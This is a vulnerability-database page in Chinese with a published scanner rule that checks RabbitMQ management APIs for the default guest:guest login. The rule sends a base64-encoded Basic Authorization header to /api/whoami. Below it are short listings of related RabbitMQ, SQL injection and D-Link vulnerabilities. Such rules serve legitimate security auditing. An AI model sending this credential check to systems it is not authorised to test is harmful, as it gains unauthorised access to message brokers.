rabbitmq-default-password: RabbitMQ Default Password

漏洞描述

PoC代码[已公开]

id: rabbitmq-default-password

info:
    name: RabbitMQ Default Password
    author: mumu0215(https://github.com/mumu0215)
    severity: high
    verified: true
    description: app="RabbitMQ-Management"

rules:
    r0:
        request:
            method: GET
            path: /api/whoami
        expression: response.status == 401
    r1:
        request:
            method: GET
            path: /api/whoami
            headers:
                Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
        expression: response.status == 200 && response.body.bcontains(b"\"name\":\"guest\"")
expression: r0() && r1()

相关漏洞推荐

• rabbitmq-detect: RabbitMQ Detection POC

  2025-09-01 | RabbitMQ
  RabbitMQ is an open-source message-broker software that originally implemented the Advanced Message ...

• RabbitMQ 访问控制错误漏洞 无POC

  2024-11-08 | RabbitMQ
  RabbitMQ是RabbitMQ开源的一个功能丰富的多协议消息和流媒体代理。 RabbitMQ存在访问控制错误漏洞，该漏洞源于通过HTTP API删除队列时未验证用户的configure权限。具有有...

• Pivotal Software RabbitMQ 需授权 访问控制不当漏洞 无POC

  2024-11-07 | RabbitMQ

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...